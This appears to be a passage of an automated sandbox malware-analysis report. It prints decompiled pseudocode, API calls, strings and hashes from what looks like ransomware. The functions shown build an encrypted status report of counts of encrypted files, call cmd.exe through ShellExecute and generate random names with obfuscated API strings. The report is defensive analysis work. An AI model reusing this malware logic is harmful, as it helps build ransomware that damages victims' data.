Instruction Fuzzy Hash: D641A271A0021AABDB209F65AC59FBB77ADEF48751F4040D9F905E3141DB78AA128FE0

Uniqueness

Uniqueness Score: -1.00%

Function 0FBC5670 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 169
stringmemoryencryptionCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E0FBC5670(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				BYTE* _v8;
				void* _v12;
				void* _v16;
				int _v20;
				char _v22;
				short _v24;
				short _v28;
				char _v36;
				char _v180;
				char _v435;
				char _v436;
				WCHAR* _t40;
				signed int _t48;
				int _t60;
				void* _t61;
				char _t68;
				CHAR* _t71;
				void* _t74;
				short _t79;
				short _t80;
				char _t81;
				BYTE* _t84;
				WCHAR* _t92;
				signed int _t93;
				char* _t95;
				void* _t96;
				int _t98;
				long _t99;
				void* _t100;

				_t88 = __edx;
				_t74 = __ecx;
				_t96 = __edx;
				_v12 = __ecx;
				_t40 = VirtualAlloc(0, 0x4c02, 0x3000, 0x40);
				_v16 = _t40;
				if(_t40 == 0) {
					_t92 = 0;
					_t71 = 0;
				} else {
					_t3 =  &(_t40[0x400]); // 0x800
					_t71 = _t3;
					_t92 = _t40;
				}
				_push(_t96);
				_v8 = _t92;
				wsprintfW(_t92, L"action=result&e_files=%d&e_size=%I64u&e_time=%d&", _v12, _a4, _a8);
				_push(0);
				_push(_t74);
				_push(0);
				_push(0);
				_push(_t74);
				_push(0);
				_push(_t74);
				_push(0);
				_push(_t74);
				_push(0);
				_push(_t74);
				_push(0);
				_push(0);
				_push(_t74);
				_push(0);
				E0FBC39F0( &_v180);
				E0FBC7330( &_v180, _t88);
				E0FBC7140( &_v180);
				E0FBC6F40( &_v180,  &(_t92[lstrlenW(_t92)]));
				_t48 = lstrlenW(_t92);
				_t79 = "#shasj"; // 0x61687323
				_t93 = _t48;
				asm("movq xmm0, [0xfbcfc78]");
				_v28 = _t79;
				_t80 =  *0xfbcfc84; // 0x6a73
				_v24 = _t80;
				_t81 =  *0xfbcfc86; // 0x0
				asm("movq [ebp-0x20], xmm0");
				_v22 = _t81;
				_v436 = 0;
				E0FBC9010( &_v435, 0, 0xff);
				E0FBC5D70( &_v436,  &_v36, lstrlenA( &_v36));
				_t98 = _t93 + _t93;
				E0FBC5E20( &_v436, _v8, _t98);
				_v20 = _t93 * 8;
				if(CryptBinaryToStringA(_v8, _t98, 0x40000001, _t71,  &_v20) == 0) {
					GetLastError();
				}
				_t29 = lstrlenA(_t71) + 4; // 0x4
				_t99 = _t29;
				_v12 = VirtualAlloc(0, _t99, 0x3000, 0x40);
				_t60 = lstrlenA(_t71);
				_t84 = _v12;
				_t61 = _t60 + 2;
				if(_t84 == 0) {
					L7:
					_v8 = 0;
				} else {
					_v8 = _t84;
					if(_t61 >= _t99) {
						goto L7;
					}
				}
				_t100 = 0;
				if(lstrlenA(_t71) != 0) {
					_t95 = _v8;
					do {
						_t68 =  *((intOrPtr*)(_t100 + _t71));
						if(_t68 != 0xa && _t68 != 0xd) {
							 *_t95 = _t68;
							_t95 = _t95 + 1;
						}
						_t100 = _t100 + 1;
					} while (_t100 < lstrlenA(_t71));
				}
				E0FBC54A0(_v8, 0, 0);
				_t73 =  !=  ? 1 : 0;
				VirtualFree(_v12, 0, 0x8000);
				E0FBC7C10( &_v180);
				VirtualFree(_v16, 0, 0x8000);
				_t67 =  !=  ? 1 : 0;
				return  !=  ? 1 : 0;
			}

0x0fbc5670
0x0fbc5670
0x0fbc568a
0x0fbc568c
0x0fbc568f
0x0fbc5695
0x0fbc569a
0x0fbc56a6
0x0fbc56a8
0x0fbc569c
0x0fbc569c
0x0fbc569c
0x0fbc56a2
0x0fbc56a2
0x0fbc56aa
0x0fbc56ae
0x0fbc56bd
0x0fbc56c6
0x0fbc56c8
0x0fbc56c9
0x0fbc56ce
0x0fbc56d0
0x0fbc56d1
0x0fbc56d3
0x0fbc56d4
0x0fbc56d6
0x0fbc56d7
0x0fbc56d9
0x0fbc56da
0x0fbc56df
0x0fbc56e1
0x0fbc56e2
0x0fbc56ea
0x0fbc56f5
0x0fbc5700
0x0fbc5718
0x0fbc571e
0x0fbc5720
0x0fbc5726
0x0fbc5728
0x0fbc5736
0x0fbc5739
0x0fbc5745
0x0fbc5749
0x0fbc5752
0x0fbc5757
0x0fbc575a
0x0fbc5761
0x0fbc577d
0x0fbc5785
0x0fbc5792
0x0fbc57a1
0x0fbc57ba
0x0fbc57bc
0x0fbc57bc
0x0fbc57d2
0x0fbc57d2
0x0fbc57df
0x0fbc57e2
0x0fbc57e4
0x0fbc57e7
0x0fbc57ec
0x0fbc57f5
0x0fbc57f5
0x0fbc57ee
0x0fbc57ee
0x0fbc57f3
0x00000000
0x00000000
0x0fbc57f3
0x0fbc57fd
0x0fbc5803
0x0fbc5805
0x0fbc5808
0x0fbc5808
0x0fbc580d
0x0fbc5813
0x0fbc5815
0x0fbc5815
0x0fbc5817
0x0fbc581e
0x0fbc5808
0x0fbc5829
0x0fbc5843
0x0fbc5850
0x0fbc5858
0x0fbc5867
0x0fbc586b
0x0fbc5871

APIs

VirtualAlloc.KERNEL32(00000000,00004C02,00003000,00000040,?,00000000,?), ref: 0FBC568F
wsprintfW.USER32 ref: 0FBC56BD
lstrlenW.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000), ref: 0FBC570C
lstrlenW.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000), ref: 0FBC571E
_memset.LIBCMT ref: 0FBC5761
lstrlenA.KERNEL32(00000000,?,?,00000000,00000000,?,00000000), ref: 0FBC576D
CryptBinaryToStringA.CRYPT32(?,772969A0,40000001,00000000,00000000), ref: 0FBC57B2
GetLastError.KERNEL32(?,?,?,?,00000000,00000000,?,00000000), ref: 0FBC57BC
lstrlenA.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,00000000), ref: 0FBC57C9
VirtualAlloc.KERNEL32(00000000,00000004,00003000,00000040,?,?,?,?,00000000,00000000,?,00000000), ref: 0FBC57D8
lstrlenA.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,00000000), ref: 0FBC57E2
lstrlenA.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,00000000), ref: 0FBC57FF
lstrlenA.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,00000000), ref: 0FBC5818
VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,?,00000000,00000000,?,00000000), ref: 0FBC5850
VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,?,00000000,00000000,?,00000000), ref: 0FBC5867

Strings

#shasj, xrefs: 0FBC5720
action=result&e_files=%d&e_size=%I64u&e_time=%d&, xrefs: 0FBC56B7

Memory Dump Source

Source File: 00000009.00000002.293108721.000000000FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 0FBC0000, based on PE: true

Associated: 00000009.00000002.293102510.000000000FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293144665.000000000FBCA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293155621.000000000FBD2000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293163225.000000000FBD4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fbc0000_wjaoab.jbxd

Yara matches

Similarity

API ID: lstrlen$Virtual$AllocFree$BinaryCryptErrorLastString_memsetwsprintf
String ID: #shasj$action=result&e_files=%d&e_size=%I64u&e_time=%d&
API String ID: 2994799111-4131875188
Opcode ID: 77cbd088bd4338bb51c0d390eb5b7ef084297accec89f3bf2dc13a3c8cc7a4e9
Instruction ID: 07f48035be0b3e4198190c463b4ba0898ef355f3494ae67a50634b21b9fc537a
Opcode Fuzzy Hash: 77cbd088bd4338bb51c0d390eb5b7ef084297accec89f3bf2dc13a3c8cc7a4e9
Instruction Fuzzy Hash: 3E51AF71A00219ABEB209B65EC45FEF7B79EF48700F1400E8EA05A7181EB747A15CFE5

Uniqueness

Uniqueness Score: -1.00%

Function 0FBC5210 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 145
memorystringencryptionCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E0FBC5210(CHAR* __ecx, CHAR** __edx) {
				int _v8;
				long _v12;
				char _v14;
				void* _v16;
				void* _v20;
				void* _v24;
				char _v28;
				CHAR** _v32;
				void* _v36;
				char _v291;
				char _v292;
				void* _v348;
				void* _v352;
				int _t43;
				BYTE* _t44;
				int _t46;
				void* _t50;
				void* _t51;
				char _t52;
				void* _t64;
				signed int _t66;
				signed int _t68;
				int _t69;
				int _t72;
				char _t74;
				intOrPtr _t75;
				CHAR* _t84;
				char* _t86;
				void* _t88;
				signed char _t89;
				WCHAR* _t94;
				CHAR* _t95;
				BYTE* _t101;
				WCHAR* _t102;
				WCHAR* _t103;
				void* _t104;
				long _t105;
				long _t106;
				int _t107;
				void* _t108;
				CHAR* _t109;
				void* _t110;

				_t86 = __ecx;
				_v32 = __edx;
				_t43 = lstrlenA(__ecx) + 1;
				_v8 = _t43;
				_t3 = _t43 + 1; // 0x2
				_t105 = _t3;
				_t44 = VirtualAlloc(0, _t105, 0x3000, 0x40);
				_v36 = _t44;
				if(_t44 == 0 || _v8 >= _t105) {
					_t101 = 0;
					__eflags = 0;
				} else {
					_t101 = _t44;
				}
				_t106 = 0;
				_t46 = CryptStringToBinaryA(_t86, 0, 1, _t101,  &_v8, 0, 0);
				_t119 = _t46;
				if(_t46 == 0) {
					GetLastError();
					goto L14;
				} else {
					_t50 = "#shasj"; // 0x61687323
					asm("movq xmm0, [0xfbcfc78]");
					_t107 = _v8;
					_v20 = _t50;
					_t51 =  *0xfbcfc84; // 0x6a73
					_v16 = _t51;
					_t52 =  *0xfbcfc86; // 0x0
					_v14 = _t52;
					asm("movq [ebp-0x18], xmm0");
					_v292 = 0;
					E0FBC9010( &_v291, 0, 0xff);
					E0FBC5D70( &_v292,  &_v28, lstrlenA( &_v28));
					E0FBC5E20( &_v292, _t101, _t107);
					_t94 =  &_v28;
					asm("xorps xmm0, xmm0");
					asm("movdqu [ebp-0x18], xmm0");
					E0FBC33E0(_t94, _t119, _t101);
					if(_v28 != 0) {
						E0FBC5190();
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(lstrlenA);
						_push(_t107);
						_push(_t101);
						_t102 = _t94;
						_t108 = VirtualAlloc(0, 0x404, 0x3000, 0x40);
						_v352 = _t108;
						GetModuleFileNameW(0, _t108, 0x200);
						_t88 = CreateFileW(_t108, 0x80000000, 1, 0, 3, 0x80, 0);
						_v348 = _t88;
						__eflags = _t88 - 0xffffffff;
						if(_t88 != 0xffffffff) {
							_t64 = CreateFileMappingW(_t88, 0, 8, 0, 0, 0);
							_v28 = _t64;
							__eflags = _t64;
							if(_t64 != 0) {
								_t66 = MapViewOfFile(_t64, 1, 0, 0, 0);
								_v16 = _t66;
								__eflags = _t66;
								if(_t66 != 0) {
									_t29 = _t66 + 0x4e; // 0x4e
									_t109 = _t29;
									_v12 = _t109;
									_t68 = lstrlenW(_t102);
									_t89 = 0;
									_t103 =  &(_t102[_t68]);
									_t69 = lstrlenA(_t109);
									__eflags = _t69 + _t69;
									if(_t69 + _t69 != 0) {
										_t95 = _t109;
										do {
											__eflags = _t89 & 0x00000001;
											if((_t89 & 0x00000001) != 0) {
												 *((char*)(_t103 + _t89)) = 0;
											} else {
												_t74 =  *_t109;
												_t109 =  &(_t109[1]);
												 *((char*)(_t103 + _t89)) = _t74;
											}
											_t89 = _t89 + 1;
											_t72 = lstrlenA(_t95);
											_t95 = _v12;
											__eflags = _t89 - _t72 + _t72;
										} while (_t89 < _t72 + _t72);
									}
									UnmapViewOfFile(_v16);
									_t88 = _v20;
									_t108 = _v24;
								}
								CloseHandle(_v28);
							}
							CloseHandle(_t88);
						}
						return VirtualFree(_t108, 0, 0x8000);
					} else {
						_t104 = _v24;
						_t75 =  *0xfbd2a60; // 0x0
						_t110 = _v20;
						_t76 =  !=  ? 0 : _t75;
						_v12 = 1;
						 *0xfbd2a60 =  !=  ? 0 : _t75;
						if(_t110 != 0) {
							_t84 = VirtualAlloc(0, lstrlenA(_t110) + 1, 0x3000, 4);
							 *_v32 = _t84;
							if(_t84 != 0) {
								lstrcpyA(_t84, _t110);
							}
						}
						_t77 = GetProcessHeap;
						if(_t104 != 0) {
							HeapFree(GetProcessHeap(), 0, _t104);
							_t77 = GetProcessHeap;
						}
						if(_t110 != 0) {
							HeapFree( *_t77(), 0, _t110);
						}
						_t106 = _v12;
						L14:
						VirtualFree(_v36, 0, 0x8000);
						return _t106;
					}
				}
			}

0x0fbc521c
0x0fbc521e
0x0fbc5228
0x0fbc5230
0x0fbc5233
0x0fbc5233
0x0fbc5239
0x0fbc523f
0x0fbc5244
0x0fbc524f
0x0fbc524f
0x0fbc524b
0x0fbc524b
0x0fbc524b
0x0fbc5251
0x0fbc525e
0x0fbc5264
0x0fbc5266
0x0fbc5385
0x00000000
0x0fbc526c
0x0fbc526c
0x0fbc5271
0x0fbc5279
0x0fbc527c
0x0fbc527f
0x0fbc5285
0x0fbc5289
0x0fbc5293
0x0fbc529f
0x0fbc52a4
0x0fbc52ab
0x0fbc52c9
0x0fbc52d7
0x0fbc52df
0x0fbc52e2
0x0fbc52e5
0x0fbc52eb
0x0fbc52f4
0x0fbc538d
0x0fbc5392
0x0fbc5393
0x0fbc5394
0x0fbc5395
0x0fbc5396
0x0fbc5397
0x0fbc5398
0x0fbc5399
0x0fbc539a
0x0fbc539b
0x0fbc539c
0x0fbc539d
0x0fbc539e
0x0fbc539f
0x0fbc53a6
0x0fbc53a7
0x0fbc53a8
0x0fbc53b7
0x0fbc53bf
0x0fbc53c9
0x0fbc53cc
0x0fbc53eb
0x0fbc53ed
0x0fbc53f0
0x0fbc53f3
0x0fbc5404
0x0fbc540a
0x0fbc540d
0x0fbc540f
0x0fbc541a
0x0fbc5420
0x0fbc5423
0x0fbc5425
0x0fbc5427
0x0fbc5427
0x0fbc542b
0x0fbc542e
0x0fbc5435
0x0fbc5437
0x0fbc543a
0x0fbc5440
0x0fbc5442
0x0fbc5444
0x0fbc5446
0x0fbc5446
0x0fbc5449
0x0fbc5453
0x0fbc544b
0x0fbc544b
0x0fbc544d
0x0fbc544e
0x0fbc544e
0x0fbc5458
0x0fbc5459
0x0fbc545f
0x0fbc5464
0x0fbc5464
0x0fbc5446
0x0fbc546b
0x0fbc5471
0x0fbc5474
0x0fbc5474
0x0fbc547a
0x0fbc547a
0x0fbc5481
0x0fbc5481
0x0fbc549b
0x0fbc52fa
0x0fbc52fa
0x0fbc52ff
0x0fbc5306
0x0fbc5309
0x0fbc530c
0x0fbc5313
0x0fbc531a
0x0fbc532a
0x0fbc5333
0x0fbc5337
0x0fbc533b
0x0fbc533b
0x0fbc5337
0x0fbc5347
0x0fbc534e
0x0fbc5356
0x0fbc5358
0x0fbc5358
0x0fbc535f
0x0fbc5367
0x0fbc5367
0x0fbc5369
0x0fbc536c
0x0fbc5376
0x0fbc5384
0x0fbc5384
0x0fbc52f4

APIs

lstrlenA.KERNEL32(?,00000001,?,?), ref: 0FBC5222
VirtualAlloc.KERNEL32(00000000,00000002,00003000,00000040), ref: 0FBC5239
CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 0FBC525E
_memset.LIBCMT ref: 0FBC52AB
lstrlenA.KERNEL32(?), ref: 0FBC52BD
lstrlenA.KERNEL32(?,00003000,00000004,00000000), ref: 0FBC5324
VirtualAlloc.KERNEL32(00000000,00000001), ref: 0FBC532A
lstrcpyA.KERNEL32(00000000,?), ref: 0FBC533B
HeapFree.KERNEL32(00000000), ref: 0FBC5356
HeapFree.KERNEL32(00000000), ref: 0FBC5367
VirtualFree.KERNEL32(?,00000000,00008000), ref: 0FBC5376
GetLastError.KERNEL32 ref: 0FBC5385

Part of subcall function 0FBC5190: VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004,00000000,00000000,0FBC5392,00000000), ref: 0FBC51A6
Part of subcall function 0FBC5190: VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004), ref: 0FBC51B8
Part of subcall function 0FBC5190: GetModuleFileNameW.KERNEL32(00000000,00000000,00000200), ref: 0FBC51C8
Part of subcall function 0FBC5190: wsprintfW.USER32 ref: 0FBC51D9
Part of subcall function 0FBC5190: ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0FBC51F3
Part of subcall function 0FBC5190: ExitProcess.KERNEL32 ref: 0FBC51FB

Strings

#shasj, xrefs: 0FBC526C

Memory Dump Source

Source File: 00000009.00000002.293108721.000000000FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 0FBC0000, based on PE: true

Associated: 00000009.00000002.293102510.000000000FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293144665.000000000FBCA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293155621.000000000FBD2000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293163225.000000000FBD4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fbc0000_wjaoab.jbxd

Yara matches

Similarity

API ID: Virtual$Alloc$Freelstrlen$Heap$BinaryCryptErrorExecuteExitFileLastModuleNameProcessShellString_memsetlstrcpywsprintf
String ID: #shasj
API String ID: 834684195-2423951532
Opcode ID: 26df987859a946e9d6baf1d69b3a714ec7f48bc46801b8badc22340f95049042
Instruction ID: 0f6b1d61454d4d449db6952286125fe3658e4741ab99dea6b0dd3571dae2f4f4
Opcode Fuzzy Hash: 26df987859a946e9d6baf1d69b3a714ec7f48bc46801b8badc22340f95049042
Instruction Fuzzy Hash: 9E41A971A00219AFDB219BA6AC44BEF7BBCFF49711F040199E905E7241DB78A951CFE0

Uniqueness

Uniqueness Score: -1.00%

Function 0FBC8150 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 111
encryptionlibrarymemoryCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E0FBC8150(intOrPtr __ecx, void* __edx) {
				long* _v8;
				intOrPtr _v12;
				signed int _v16;
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v34;
				short _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				char _v48;
				long** _t37;
				struct HINSTANCE__* _t45;
				_Unknown_base(*)()* _t46;
				signed int _t54;
				long _t55;
				intOrPtr _t56;
				signed int _t58;
				signed int _t60;
				void* _t63;
				void* _t64;
				void* _t65;

				_t54 = 0;
				_v12 = __ecx;
				_t37 =  &_v8;
				_t63 = __edx;
				__imp__CryptAcquireContextW(_t37, 0, 0, 1, 0xf0000000);
				if(_t37 == 0) {
					L15:
					return _t54;
				} else {
					_t58 = 0;
					do {
						_t3 = _t58 + 0x61; // 0x61
						 *((short*)(_t65 + _t58 * 2 - 0x64)) = _t3;
						_t58 = _t58 + 1;
					} while (_t58 < 0x1a);
					_t7 = _t63 + 1; // 0x1
					_t55 = _t7;
					_t64 = VirtualAlloc(0, _t55, 0x3000, 0x40);
					if(_t64 == 0 || _t63 >= _t55) {
						CryptReleaseContext(_v8, 0);
						VirtualFree(_t64, 0, 0x8000);
						return 0;
					} else {
						_v48 = 0x70797243;
						_v44 = 0x6e654774;
						_v40 = 0x646e6152;
						_v36 = 0x6d6f;
						_v34 = 0;
						_v32 = 0x61766441;
						_v28 = 0x32336970;
						_v24 = 0x6c6c642e;
						_v20 = 0;
						_t45 = GetModuleHandleA( &_v32);
						if(_t45 != 0) {
							L7:
							_t19 =  &_v48; // 0x70797243
							_t46 = GetProcAddress(_t45, _t19);
							if(_t46 == 0) {
								goto L13;
							} else {
								_push(_t64);
								_push(_t63);
								_push(_v8);
								if( *_t46() == 0) {
									goto L13;
								} else {
									_t60 = 0;
									if(_t63 != 0) {
										_t56 = _v12;
										_v16 = 0x1a;
										do {
											asm("cdq");
											 *((short*)(_t56 + _t60 * 2)) =  *((intOrPtr*)(_t65 + ( *(_t64 + _t60) & 0x000000ff) % _v16 * 2 - 0x64));
											_t60 = _t60 + 1;
										} while (_t60 < _t63);
									}
									_t54 = 1;
								}
							}
						} else {
							_t18 =  &_v32; // 0x61766441
							_t45 = LoadLibraryA(_t18);
							if(_t45 == 0) {
								L13:
								_t54 = 0;
							} else {
								goto L7;
							}
						}
						CryptReleaseContext(_v8, 0);
						VirtualFree(_t64, 0, 0x8000);
						goto L15;
					}
				}
			}

0x0fbc8160
0x0fbc8162
0x0fbc8167
0x0fbc816a
0x0fbc816d
0x0fbc8175
0x0fbc8269
0x0fbc8271
0x0fbc817b
0x0fbc817b
0x0fbc8180
0x0fbc8180
0x0fbc8183
0x0fbc8188
0x0fbc8189
0x0fbc8195
0x0fbc8195
0x0fbc81a1
0x0fbc81a5
0x0fbc8277
0x0fbc8285
0x0fbc8293
0x0fbc81b3
0x0fbc81b6
0x0fbc81be
0x0fbc81c5
0x0fbc81cc
0x0fbc81d2
0x0fbc81d6
0x0fbc81dd
0x0fbc81e4
0x0fbc81eb
0x0fbc81ef
0x0fbc81f7
0x0fbc8207
0x0fbc8207
0x0fbc820c
0x0fbc8214
0x00000000
0x0fbc8216
0x0fbc8216
0x0fbc8217
0x0fbc8218
0x0fbc821f
0x00000000
0x0fbc8221
0x0fbc8221
0x0fbc8225
0x0fbc8227
0x0fbc822a
0x0fbc8231
0x0fbc8235
0x0fbc823e
0x0fbc8242
0x0fbc8243
0x0fbc8231
0x0fbc8247
0x0fbc8247
0x0fbc821f
0x0fbc81f9
0x0fbc81f9
0x0fbc81fd
0x0fbc8205
0x0fbc824e
0x0fbc824e
0x00000000
0x00000000
0x00000000
0x0fbc8205
0x0fbc8255
0x0fbc8263
0x00000000
0x0fbc8263
0x0fbc81a5

APIs

CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 0FBC816D
VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000040), ref: 0FBC819B
GetModuleHandleA.KERNEL32(?), ref: 0FBC81EF
LoadLibraryA.KERNEL32(Advapi32.dll), ref: 0FBC81FD
GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 0FBC820C
CryptReleaseContext.ADVAPI32(?,00000000), ref: 0FBC8255
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0FBC8263
CryptReleaseContext.ADVAPI32(?,00000000), ref: 0FBC8277
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0FBC8285

Strings

CryptGenRandomAdvapi32.dll, xrefs: 0FBC8207, 0FBC820A
Advapi32.dll, xrefs: 0FBC81F9, 0FBC81FC

Memory Dump Source

Source File: 00000009.00000002.293108721.000000000FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 0FBC0000, based on PE: true

Associated: 00000009.00000002.293102510.000000000FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293144665.000000000FBCA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293155621.000000000FBD2000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293163225.000000000FBD4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fbc0000_wjaoab.jbxd

Yara matches

Similarity

API ID: ContextCryptVirtual$FreeRelease$AcquireAddressAllocHandleLibraryLoadModuleProc
String ID: Advapi32.dll$CryptGenRandomAdvapi32.dll
API String ID: 3996966626-2152921537
Opcode ID: 2f88a0b68a0132414fe732e0b4292ade13d6c898f3c3941ace4935ba6b5f9af9
Instruction ID: e3dbaa0d50a41ce713404b77e9522ea64f8cd891d5e9c89bc397128343545414
Opcode Fuzzy Hash: 2f88a0b68a0132414fe732e0b4292ade13d6c898f3c3941ace4935ba6b5f9af9
Instruction Fuzzy Hash: 7C31D574A00209ABDB109FE6EC59BEFBB7CEF49711F1040ADE905A6141D734D611CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0FBC82A0 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 96
encryptionlibrarymemoryCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E0FBC82A0(intOrPtr __ecx, intOrPtr __edx) {
				long* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v34;
				short _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				char _v48;
				long** _t25;
				struct HINSTANCE__* _t33;
				_Unknown_base(*)()* _t34;
				long _t40;
				void* _t42;
				void* _t46;
				void* _t47;
				void* _t48;

				_t46 = 0;
				_v16 = __ecx;
				_t25 =  &_v8;
				_v12 = __edx;
				__imp__CryptAcquireContextW(_t25, 0, 0, 1, 0xf0000000);
				if(_t25 == 0) {
					L10:
					return _t46;
				} else {
					_t42 = 0;
					do {
						_t4 = _t42 + 0x61; // 0x61
						 *((char*)(_t48 + _t42 - 0x38)) = _t4;
						_t42 = _t42 + 1;
					} while (_t42 < 0x1a);
					_t40 = __edx + 1;
					_t47 = VirtualAlloc(0, _t40, 0x3000, 0x40);
					if(_t47 == 0 || _v12 >= _t40) {
						CryptReleaseContext(_v8, 0);
						VirtualFree(_t47, 0, 0x8000);
						return 0;
					} else {
						_v48 = 0x70797243;
						_v44 = 0x6e654774;
						_v40 = 0x646e6152;
						_v36 = 0x6d6f;
						_v34 = 0;
						_v32 = 0x61766441;
						_v28 = 0x32336970;
						_v24 = 0x6c6c642e;
						_v20 = 0;
						_t33 = GetModuleHandleA( &_v32);
						if(_t33 != 0) {
							L7:
							_t19 =  &_v48; // 0x70797243
							_t34 = GetProcAddress(_t33, _t19);
							if(_t34 != 0) {
								 *_t34(_v8, _v12, _v16);
								_t46 =  !=  ? 1 : _t46;
							}
						} else {
							_t18 =  &_v32; // 0x61766441
							_t33 = LoadLibraryA(_t18);
							if(_t33 != 0) {
								goto L7;
							}
						}
						CryptReleaseContext(_v8, 0);
						VirtualFree(_t47, 0, 0x8000);
						goto L10;
					}
				}
			}

0x0fbc82b0
0x0fbc82b2
0x0fbc82b7
0x0fbc82bd
0x0fbc82c0
0x0fbc82c8
0x0fbc8392
0x0fbc839a
0x0fbc82ce
0x0fbc82ce
0x0fbc82d0
0x0fbc82d0
0x0fbc82d3
0x0fbc82d7
0x0fbc82d8
0x0fbc82e4
0x0fbc82ee
0x0fbc82f2
0x0fbc83a0
0x0fbc83ae
0x0fbc83bc
0x0fbc8301
0x0fbc8304
0x0fbc830c
0x0fbc8313
0x0fbc831a
0x0fbc8320
0x0fbc8324
0x0fbc832b
0x0fbc8332
0x0fbc8339
0x0fbc833d
0x0fbc8345
0x0fbc8355
0x0fbc8355
0x0fbc835a
0x0fbc8362
0x0fbc836d
0x0fbc8376
0x0fbc8376
0x0fbc8347
0x0fbc8347
0x0fbc834b
0x0fbc8353
0x00000000
0x00000000
0x0fbc8353
0x0fbc837e
0x0fbc838c
0x00000000
0x0fbc838c
0x0fbc82f2

APIs

CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 0FBC82C0
VirtualAlloc.KERNEL32(00000000,00000007,00003000,00000040), ref: 0FBC82E8
GetModuleHandleA.KERNEL32(?), ref: 0FBC833D
LoadLibraryA.KERNEL32(Advapi32.dll), ref: 0FBC834B
GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 0FBC835A
CryptReleaseContext.ADVAPI32(?,00000000), ref: 0FBC837E
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0FBC838C
CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0FBC292B), ref: 0FBC83A0
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,?,0FBC292B), ref: 0FBC83AE

Strings

Advapi32.dll, xrefs: 0FBC8347, 0FBC834A
CryptGenRandomAdvapi32.dll, xrefs: 0FBC8355, 0FBC8358

Memory Dump Source

Source File: 00000009.00000002.293108721.000000000FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 0FBC0000, based on PE: true

Associated: 00000009.00000002.293102510.000000000FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293144665.000000000FBCA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293155621.000000000FBD2000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293163225.000000000FBD4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fbc0000_wjaoab.jbxd

Yara matches

Similarity

API ID: ContextCryptVirtual$FreeRelease$AcquireAddressAllocHandleLibraryLoadModuleProc
String ID: Advapi32.dll$CryptGenRandomAdvapi32.dll
API String ID: 3996966626-2152921537
Opcode ID: fcbb9546fa32c8c8788770eaab8f22faa2e986f8f8368722582220fa52666550
Instruction ID: 9ecc86f1fb2f3d7779fe8c2a7e2082535a232fc082323f2197441f4e976bd5c8
Opcode Fuzzy Hash: fcbb9546fa32c8c8788770eaab8f22faa2e986f8f8368722582220fa52666550
Instruction Fuzzy Hash: C931A471A00209AFDB108FA6EC4ABDFBB7CEB48711F104099F601F6180D7789A118FA4

Uniqueness

Uniqueness Score: -1.00%

Function 0FBC6530 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 89
